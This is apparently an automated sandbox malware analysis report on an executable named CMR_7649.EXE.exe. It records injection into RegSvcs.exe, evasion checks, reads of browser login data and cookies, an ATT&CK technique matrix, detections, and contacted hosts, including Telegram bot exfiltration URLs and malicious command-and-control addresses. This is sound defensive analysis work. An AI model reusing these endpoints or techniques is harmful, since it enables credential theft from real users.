                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1557
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_0-85713)
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | API coverage: 3.6 %
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
                  Source: RegSvcs.exe, 00000001.00000002.4109713154.0000000001466000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | API call chain: ExitProcess graph end node (graph_0-84839)
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0045A370 BlockInput
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_03EDF520 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_03EDF4C0 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_03EDDE80 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0041F250 SetUnhandledExceptionFilter
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F08008
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00436CD7 LogonUserW
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\CMR_7649.EXE.exe"
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                  Source: CMR_7649.EXE.exe | Binary or memory string: Shell_TrayWnd
                  Source: CMR_7649.EXE.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00472C3F GetUserNameW
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: CMR_7649.EXE.exe | Binary or memory string: WIN_XP
Source: CMR_7649.EXE.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: CMR_7649.EXE.exe | Binary or memory string: WIN_XPe
Source: CMR_7649.EXE.exe | Binary or memory string: WIN_VISTA
Source: CMR_7649.EXE.exe | Binary or memory string: WIN_7
Source: CMR_7649.EXE.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CMR_7649.EXE.exe.3760000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CMR_7649.EXE.exe PID: 6888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3152, type: MEMORYSTR
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_004652BE socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_00476619 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
Source: C:\Users\user\Desktop\CMR_7649.EXE.exe | Code function: 0_2_0046CEF3 OleInitialize, _wcslen, CreateBindCtx, MkParseDisplayName, CLSIDFromProgID, GetActiveObject
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 117 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 212 Process Injection | 2 Valid Accounts | LSA Secrets | 121 Security Software Discovery | SSH | 3 Clipboard Data | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 212 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Source | Detection | Scanner | Label
CMR_7649.EXE.exe | 29% | ReversingLabs | Win32.Trojan.Generic
CMR_7649.EXE.exe | 100% | Avira | HEUR/AGEN.1321671
CMR_7649.EXE.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://checkip.dyndns.org | 0% | URL Reputation | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | URL Reputation | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=enlB | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | 0% | Avira URL Cloud | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000001.00000002.4110039811.0000000003184000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003175000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot | CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.office.com/lB | RegSvcs.exe, 00000001.00000002.4110039811.000000000317F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
